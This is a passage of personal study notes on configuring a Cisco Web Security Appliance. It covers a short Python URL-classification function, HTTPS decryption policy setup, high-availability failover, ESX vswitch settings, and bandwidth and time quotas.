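    "www.facebook.com": "Social Networking",
}
BUILTIN_ACTIONS = {"Search Engines": "allow", "Social Networking": "block"}
UNCATEGORISED_ACTION = "monitor"
REPUTATION_BLOCK_BELOW = -6.0   # constructed reputation threshold


def host_matches(pattern, host):
    """Apply one custom-category pattern to a hostname."""
    if pattern.startswith("re:"):
        return re.search(pattern[3:], host) is not None
    if pattern.startswith("."):
        domain = pattern[1:]
        return host == domain or host.endswith("." + domain)
    return host == pattern


def classify(url, reputation=None):
    """Return (action, reason) for a URL following the processing order."""
    host = (urlparse(url).hostname or "").lower()
    # 1. Custom categories win outright (allow or block).
    for cat, patterns in CUSTOM_CATEGORIES.items():
        if any(host_matches(p, host) for p in patterns):
            return CUSTOM_ACTIONS[cat], f"custom category {cat}"
    # 2. Built-in category, else 3. the uncategorised rule.
    cat = BUILTIN_CATEGORIES.get(host)
    if cat:
        action, reason = BUILTIN_ACTIONS[cat], f"built-in category {cat}"
    else:
        action, reason = UNCATEGORISED_ACTION, "uncategorised"
    # 4. Web reputation score can still block anything not already blocked.
    if action != "block" and reputation is not None and reputation < REPUTATION_BLOCK_BELOW:
        return "block", f"{reason}; reputation {reputation} below threshold"
    return action, reason
```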

WSA HTTPS/SSL decryption

Sec Services -> HTTPS proxy
Enable HTTPS proxy
Create decryption policy
Explicit forward mode is better for HTTPS decryption as the HTTP CONNECT messages are sent to the WSA
Default - pass through (do nothing)
Decrypt - WSA acts as man in the middle
Drop - drop the traffic
Monitor - watch what's going on but allow it

If the action is decrypt, the WSA decrypts the traffic and then sends it through the access policies too. You need a ROOT certificate (Subject Type=CA, not End Entity). It's not the same as normal SSL cert signing.


Security services -> HTTPS proxy
Takes some time to enable (wait 5 min)
Now click enable and edit settings, accept the EULA
Leave default port of 443
Use generate cert+key for a self-signed key
cn: lab.domain.com
org: myorg
ou: mylab
country: ie
duration: 36
click generate

Download the CSR, get it signed by your CA, then upload it back to the WSA
Or download cert from WSA and push out via group policy.

Untick "enable decryption for authentication"
Might need to enable decryption for enhanced AVC
Submit

We can change settings to control what the WSA does if there is an issue with the cert on the destination server: drop, allow etc.

URL filter policy

After it's set up, run a policy trace on https://www.google.ie

Keep in mind some global settings can override your policies

Default action kicks in when the WSA couldn't decide on a final action. 

High availability

Can use a dedicated load balancer if you want
HA is available in Async OS 8.5.0
HA is available in both physical and virtual
Single master, multiple backups
Preemption (the master can take back over)
HA DOES NOT SYNC CONFIG, you need to do it manually

You cannot sync the config with HA, but you can manually transfer the config to another WSA.

Steps to copy config from the WSA:

Set up the master how you want with all settings etc
Go to WSA GUI > System Administration > Configuration File > Uncheck "Mask passphrases" by selecting "Plain passwords in the Configuration Files" > Now click submit and the config will be downloaded as an XML file.

Steps to upload config to another WSA:
Go to WSA GUI > System Administration > Configuration File > under Load configuration select “Load a configuration file from local computer” > Browse to the downloaded config and then click load.

Setting up the HA
On master
Make sure you are running at least 8.5
Network -> High availability
New failover group
Need a VIP (subnet mask must match interface it gets bound to)
Bind it to an interface
Master
Can enable a shared secret

On backup
Configure:
Same failover group
Same VIP
Set priority as backup
Same shared secret if you set one

higher priority = will become master

Point clients at the VIP in their proxy settings.

on the master
failoverconfig - see failover settings
testfailovergroup (then -1)

Make sure to do the ESX/vswitch part

ESX config
https://www.cisco.com/c/en/us/support/docs/security/web-security-appliance/119188-technote-wsa-00.html  

Check that
Net.ReversePathFwdCheckPromisc is set to 1


Edit properties on the vswitch where hosts are.
Edit -> Security
Promiscuous mode = accept  

Bandwidth and time quota

Quotas can be applied for HTTP/HTTPS and FTP
Quotas are reset daily

Web security manager -> Time range and quotas
Add time range button
Add quota button
Give it a name, set the time for the quota to be reset (default midnight)
Volume quota is set in MB or GB.

Tie to an access policy
Web security manager -> Access policies -> URL filtering
Pick a category and tick quota
Tick quota based, select your quota
Commit

Users will get a message that they are over quota when they go over.

Upgrades

It's best to upgrade from the VMware console as you will see all errors there.

More info

CCIE Security Advanced Technology Course v4